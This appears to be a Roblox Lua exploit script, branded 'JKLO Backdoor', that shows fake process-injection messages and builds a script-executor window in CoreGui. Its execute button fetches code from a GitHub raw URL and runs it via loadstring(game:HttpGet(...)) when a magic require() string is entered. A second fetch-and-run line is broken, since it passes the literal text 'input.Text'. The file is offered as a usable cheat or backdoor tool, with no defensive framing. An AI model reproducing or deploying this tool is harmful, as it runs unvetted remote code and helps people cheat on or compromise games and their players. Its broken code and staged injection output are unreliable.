game.StarterGui:SetCore("DevConsoleVisible", true)
wait(1)
print("Found ROBLOX Process...")
game.StarterGui:SetCore("DevConsoleVisible", true)
wait(2)
print("Injecting 'JKLO' into CoreGui...")
game.StarterGui:SetCore("DevConsoleVisible", true)
wait(4)
print("Injection Complete!")
wait(1)
game.StarterGui:SetCore("DevConsoleVisible", false)


local STIGMA = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local main = Instance.new("Frame")
local ScrollingFrame = Instance.new("ScrollingFrame")
local input = Instance.new("TextBox")
local execute = Instance.new("TextButton")
local clear = Instance.new("TextButton")
local file = Instance.new("TextButton")
local extras = Instance.new("TextButton")
local lua = Instance.new("TextButton")
local help = Instance.new("TextButton")
local fileframe = Instance.new("Frame")
local minimize = Instance.new("TextButton")
local exit = Instance.new("TextButton")
local TextLabel = Instance.new("TextLabel")
local minimized = Instance.new("TextButton")
local windowframe = Instance.new("Frame")
local windowmain = Instance.new("Frame")
local createdby = Instance.new("TextLabel")
local buttonframe = Instance.new("Frame")
local TextButton = Instance.new("TextButton")
local abouttext = Instance.new("TextLabel")
local helpframe = Instance.new("Frame")
local about = Instance.new("TextButton")
local ImageLabel = Instance.new("ImageLabel")



STIGMA.Name = "STIGMA"
STIGMA.Parent = game.CoreGui
STIGMA.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

Frame.Parent = STIGMA
Frame.BackgroundColor3 = Color3.fromRGB(253, 253, 253)
Frame.BorderColor3 = Color3.fromRGB(143, 210, 255)
Frame.BorderSizePixel = 0
Frame.Position = UDim2.new(0.132295713, 0, 0.169778302, 0)
Frame.Size = UDim2.new(0, 332, 0, 252)
Frame.Active = true
Frame.Draggable = true

main.Name = "main"
main.Parent = Frame
main.BackgroundColor3 = Color3.fromRGB(243, 243, 243)
main.BorderColor3 = Color3.fromRGB(152, 152, 152)
main.Position = UDim2.new(0.00608264981, 0, 0.10370709, 0)
main.Size = UDim2.new(0, 327, 0, 225)

ScrollingFrame.Parent = main
ScrollingFrame.Active = true
ScrollingFrame.BackgroundColor3 = Color3.new(0.392157, 0.392157, 0.392157)
ScrollingFrame.BorderColor3 = Color3.fromRGB(152, 152, 152)
ScrollingFrame.Position = UDim2.new(-4.6662965e-08, 0, 0.088888891, 0)
ScrollingFrame.Selectable = false
ScrollingFrame.Size = UDim2.new(0, 286, 0, 205)

input.Name = "input"
input.Parent = ScrollingFrame
input.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
input.BorderColor3 = Color3.fromRGB(0, 0, 0)
input.BorderSizePixel = 0
input.Position = UDim2.new(0, 0, 7.44331174e-08, 0)
input.Size = UDim2.new(0, 272, 0, 449)
input.Font = Enum.Font.Arcade
input.Text = ""
input.TextColor3 = Color3.fromRGB(0, 0, 0)
input.TextSize = 14.000
input.TextXAlignment = Enum.TextXAlignment.Left
input.TextYAlignment = Enum.TextYAlignment.Top
input.MultiLine = true

execute.Name = "execute"
execute.Parent = main
execute.BackgroundColor3 = Color3.new(0.392157, 0.392157, 0.392157)
execute.BorderColor3 = Color3.fromRGB(199, 199, 199)
execute.Position = UDim2.new(0.877675772, 0, 0.088888891, 0)
execute.Size = UDim2.new(0, 40, 0, 102)
execute.Font = Enum.Font.Arcade
execute.Text = "EXE"
execute.TextColor3 = Color3.fromRGB(0, 0, 0)
execute.TextSize = 14.000
execute.MouseButton1Click:Connect(function()
if input.Text == "require(5253281926).bjgui('Tubers93HKRB')" then
		wait(0.5)
		loadstring(game:HttpGet("https://raw.githubusercontent.com/BOSSJKL2/TestGUI/main/TESTGUIbJ"))()
	end
wait(1)
	loadstring(game:HttpGet("input.Text"))()
end)

clear.Name = "clear"
clear.Parent = main
clear.BackgroundColor3 = Color3.new(0.392157, 0.392157, 0.392157)
clear.BorderColor3 = Color3.fromRGB(199, 199, 199)
clear.Position = UDim2.new(0.877675772, 0, 0.546666682, 0)
clear.Size = UDim2.new(0, 40, 0, 102)
clear.Font = Enum.Font.Arcade
clear.Text = "CLEAR"
clear.TextColor3 = Color3.fromRGB(0, 0, 0)
clear.TextSize = 14.000
clear.MouseButton1Click:Connect(function()
	input.Text = " "
end)

file.Name = "file"
file.Parent = main
file.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
file.BackgroundTransparency = 1.000
file.BorderColor3 = Color3.fromRGB(0, 0, 0)
file.BorderSizePixel = 0
file.Size = UDim2.new(0, 36, 0, 20)
file.Font = Enum.Font.SourceSans
file.Text = "File"
file.TextColor3 = Color3.fromRGB(0, 0, 0)
file.TextSize = 14.000
file.MouseButton1Click:Connect(function()
	fileframe.Visible = true
	helpframe.Visible = false


end)

extras.Name = "extras"
extras.Parent = main
extras.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
extras.BackgroundTransparency = 1.000
extras.BorderColor3 = Color3.fromRGB(0, 0, 0)
extras.BorderSizePixel = 0
extras.Position = UDim2.new(0.110091746, 0, 0, 0)
extras.Size = UDim2.new(0, 36, 0, 20)
extras.Font = Enum.Font.SourceSans
extras.Text = "Extras"
extras.TextColor3 = Color3.fromRGB(0, 0, 0)
extras.TextSize = 14.000


lua.Name = "lua"
lua.Parent = main
lua.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
lua.BackgroundTransparency = 1.000
lua.BorderColor3 = Color3.fromRGB(0, 0, 0)
lua.BorderSizePixel = 0
lua.Position = UDim2.new(0.220183492, 0, 0, 0)
lua.Size = UDim2.new(0, 36, 0, 20)
lua.Font = Enum.Font.SourceSans
lua.Text = "Lua"
lua.TextColor3 = Color3.fromRGB(0, 0, 0)
lua.TextSize = 14.000




help.Name = "help"
help.Parent = main
help.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
help.BackgroundTransparency = 1.000
help.BorderColor3 = Color3.fromRGB(0, 0, 0)
help.BorderSizePixel = 0
help.Position = UDim2.new(0.330275238, 0, 0, 0)
help.Size = UDim2.new(0, 36, 0, 20)
help.Font = Enum.Font.SourceSans
help.Text = "Help"
help.TextColor3 = Color3.fromRGB(0, 0, 0)
help.TextSize = 14.000
help.MouseButton1Down:connect(function()
	helpframe.Visible = true
	fileframe.Visible = false
	

end)

fileframe.Name = "fileframe"
fileframe.Parent = main
fileframe.BackgroundColor3 = Color3.fromRGB(249, 249, 249)
fileframe.BorderColor3 = Color3.fromRGB(179, 179, 179)
fileframe.Position = UDim2.new(0, 0, 0.0933333337, 0)
fileframe.Size = UDim2.new(0, 132, 0, 37)
fileframe.Visible = false

minimize.Name = "minimize"
minimize.Parent = fileframe
minimize.BackgroundColor3 = Color3.new(0.392157, 0.392157, 0.392157)
minimize.BackgroundTransparency = 1.000
minimize.BorderColor3 = Color3.fromRGB(0, 0, 0)
minimize.BorderSizePixel = 0
minimize.Position = UDim2.new(0.174242422, 0, 0, 0)
minimize.Size = UDim2.new(0, 109, 0, 18)
minimize.Font = Enum.Font.SourceSans
minimize.Text = "Minimize"
minimize.TextColor3 = Color3.fromRGB(0, 0, 0)
minimize.TextSize = 14.000
minimize.TextXAlignment = Enum.TextXAlignment.Left
minimize.MouseButton1Click:Connect(function()
	Frame.Visible = false
	minimized.Visible = true
end)

exit.Name = "exit"
exit.Parent = fileframe
exit.BackgroundColor3 = Color3.new(0.392157, 0.392157, 0.392157)
exit.BackgroundTransparency = 1.000
exit.BorderColor3 = Color3.fromRGB(0, 0, 0)
exit.BorderSizePixel = 0
exit.Position = UDim2.new(0.174242422, 0, 0.486486495, 0)
exit.Size = UDim2.new(0, 109, 0, 18)
exit.Font = Enum.Font.SourceSans
exit.Text = "Exit"
exit.TextColor3 = Color3.fromRGB(0, 0, 0)
exit.TextSize = 14.000
exit.TextXAlignment = Enum.TextXAlignment.Left
exit.MouseButton1Click:Connect(function()
	Frame.Visible = false
end)

TextLabel.Parent = Frame
TextLabel.BackgroundColor3 = Color3.new(0.392157, 0.392157, 0.392157)
TextLabel.BackgroundTransparency = 1.000
TextLabel.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextLabel.BorderSizePixel = 0
TextLabel.Position = UDim2.new(0.0843373463, 0, 0, 0)
TextLabel.Size = UDim2.new(0, 200, 0, 26)
TextLabel.Font = Enum.Font.SourceSans
TextLabel.Text = "JKLO Backdoor"
TextLabel.TextColor3 = Color3.fromRGB(74, 74, 74)
TextLabel.TextSize = 16.000
TextLabel.TextXAlignment = Enum.TextXAlignment.Left

ImageLabel.Parent = Frame
ImageLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
ImageLabel.BackgroundTransparency = 1.000
ImageLabel.BorderColor3 = Color3.fromRGB(0, 0, 0)
ImageLabel.BorderSizePixel = 0
ImageLabel.Position = UDim2.new(0.00602409616, 0, 0.0119047621, 0)
ImageLabel.Size = UDim2.new(0, 19, 0, 20)
ImageLabel.Image = "http://www.roblox.com/asset/?id=15487393092"

minimized.Name = "minimized"
minimized.Parent = STIGMA
minimized.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
minimized.BorderColor3 = Color3.fromRGB(0, 0, 0)
minimized.BorderSizePixel = 0
minimized.Position = UDim2.new(-0.000545215677, 0, 0.945157588, 0)
minimized.Size = UDim2.new(0, 93, 0, 31)
minimized.Visible = false
minimized.Font = Enum.Font.SourceSans
minimized.Text = "JKLO"
minimized.TextColor3 = Color3.fromRGB(0, 0, 0)
minimized.TextSize = 17.000
minimized.MouseButton1Click:Connect(function()
	Frame.Visible = true
	fileframe.Visible = false
	minimized.Visible = false
end)

helpframe.Name = "helpframe"
helpframe.Parent = main
helpframe.BackgroundColor3 = Color3.fromRGB(249, 249, 249)
helpframe.BorderColor3 = Color3.fromRGB(179, 179, 179)
helpframe.Position = UDim2.new(0.330275238, 0, 0.088888891, 0)
helpframe.Size = UDim2.new(0, 109, 0, 18)
helpframe.Visible = false

windowframe.Name = "windowframe"
windowframe.Parent = STIGMA
windowframe.Active = true
windowframe.BackgroundColor3 = Color3.fromRGB(253, 253, 253)
windowframe.BorderColor3 = Color3.fromRGB(143, 210, 255)
windowframe.BorderSizePixel = 0
windowframe.Position = UDim2.new(0.597292781, 0, 0.360560119, 0)
windowframe.Size = UDim2.new(0, 168, 0, 143)
windowframe.Visible = false

windowmain.Name = "windowmain"
windowmain.Parent = windowframe
windowmain.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
windowmain.BorderColor3 = Color3.fromRGB(152, 152, 152)
windowmain.Position = UDim2.new(0.0060828072, 0, 0.181817755, 0)
windowmain.Size = UDim2.new(0, 165, 0, 115)

createdby.Name = "createdby"
createdby.Parent = windowmain
createdby.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
createdby.BackgroundTransparency = 1.000
createdby.BorderColor3 = Color3.fromRGB(0, 0, 0)
createdby.BorderSizePixel = 0
createdby.Position = UDim2.new(-0.212121218, 0, 0.0956521705, 0)
createdby.Size = UDim2.new(0, 200, 0, 50)
createdby.Font = Enum.Font.SourceSans
createdby.Text = "Created by JO1TAR0"
createdby.TextColor3 = Color3.fromRGB(0, 0, 0)
createdby.TextSize = 14.000

buttonframe.Name = "buttonframe"
buttonframe.Parent = windowmain
buttonframe.BackgroundColor3 = Color3.fromRGB(227, 227, 227)
buttonframe.BorderColor3 = Color3.fromRGB(0, 0, 0)
buttonframe.BorderSizePixel = 0
buttonframe.Position = UDim2.new(0, 0, 0.530434787, 0)
buttonframe.Size = UDim2.new(0, 165, 0, 54)

TextButton.Parent = buttonframe
TextButton.BackgroundColor3 = Color3.new(0.392157, 0.392157, 0.392157)
TextButton.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextButton.Position = UDim2.new(0.393939406, 0, 0.240740746, 0)
TextButton.Size = UDim2.new(0, 84, 0, 27)
TextButton.Font = Enum.Font.SourceSans
TextButton.Text = "OK"
TextButton.TextColor3 = Color3.fromRGB(0, 0, 0)
TextButton.TextSize = 14.000
TextButton.MouseButton1Down:connect(function()
	windowframe.Visible = false
end)

abouttext.Name = "abouttext"
abouttext.Parent = windowframe
abouttext.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
abouttext.BackgroundTransparency = 1.000
abouttext.BorderColor3 = Color3.fromRGB(0, 0, 0)
abouttext.BorderSizePixel = 0
abouttext.Position = UDim2.new(0.0060828072, 0, 0, 0)
abouttext.Size = UDim2.new(0, 84, 0, 26)
abouttext.Font = Enum.Font.SourceSans
abouttext.Text = "About"
abouttext.TextColor3 = Color3.fromRGB(74, 74, 74)
abouttext.TextSize = 16.000
abouttext.TextXAlignment = Enum.TextXAlignment.Left

about.Name = "about"
about.Parent = helpframe
about.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
about.BackgroundTransparency = 1.000
about.BorderColor3 = Color3.fromRGB(0, 0, 0)
about.BorderSizePixel = 0
about.Position = UDim2.new(0.174242422, 0, 0, 0)
about.Size = UDim2.new(0, 109, 0, 18)
about.Font = Enum.Font.SourceSans
about.Text = "About"
about.TextColor3 = Color3.fromRGB(0, 0, 0)
about.TextSize = 14.000
about.TextXAlignment = Enum.TextXAlignment.Left
about.MouseButton1Down:connect(function()
	helpframe.Visible = false
	windowframe.Visible = true
end)




local xbox = Instance.new("Sound")
xbox.Parent = game:GetService("SoundService")
xbox.SoundId = "rbxassetid://3023237993"
xbox.Volume = 5
xbox.Name = "Sound"
xbox:Play()

game:GetService("StarterGui"):SetCore("SendNotification", {
	Title = "JKLO Backdoor";
	Text = "JKLO Backdoor has been Injected.";
	Icon = "http://www.roblox.com/asset/?id=15487393092";
	Duration = 6; 
	Button1 = "Ok";
})


local function XPCO_fake_script() -- Frame.Dragify 
	local script = Instance.new('LocalScript', Frame)

	local UserInputService = game:GetService("UserInputService")

	local gui = script.Parent

	local dragging
	local dragInput
	local dragStart
	local startPos

	local function update(input)
		local delta = input.Position - dragStart
		gui.Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X, startPos.Y.Scale, startPos.Y.Offset + delta.Y)
	end

	gui.InputBegan:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then
			dragging = true
			dragStart = input.Position
			startPos = gui.Position

			input.Changed:Connect(function()
				if input.UserInputState == Enum.UserInputState.End then
					dragging = false
				end
			end)
		end
	end)

	gui.InputChanged:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then
			dragInput = input
		end
	end)

	UserInputService.InputChanged:Connect(function(input)
		if input == dragInput and dragging then
			update(input)
		end
	end)
end
coroutine.wrap(XPCO_fake_script)()

local function LZVR_fake_script() -- windowframe.windowdrag 
	local script = Instance.new('LocalScript', windowframe)

	local UserInputService = game:GetService("UserInputService")

	local gui = script.Parent

	local dragging
	local dragInput
	local dragStart
	local startPos

	local function update(input)
		local delta = input.Position - dragStart
		gui.Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X, startPos.Y.Scale, startPos.Y.Offset + delta.Y)
	end

	gui.InputBegan:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then
			dragging = true
			dragStart = input.Position
			startPos = gui.Position

			input.Changed:Connect(function()
				if input.UserInputState == Enum.UserInputState.End then
					dragging = false
				end
			end)
		end
	end)

	gui.InputChanged:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then
			dragInput = input
		end
	end)

	UserInputService.InputChanged:Connect(function(input)
		if input == dragInput and dragging then
			update(input)
		end
	end)
end
coroutine.wrap(LZVR_fake_script)()
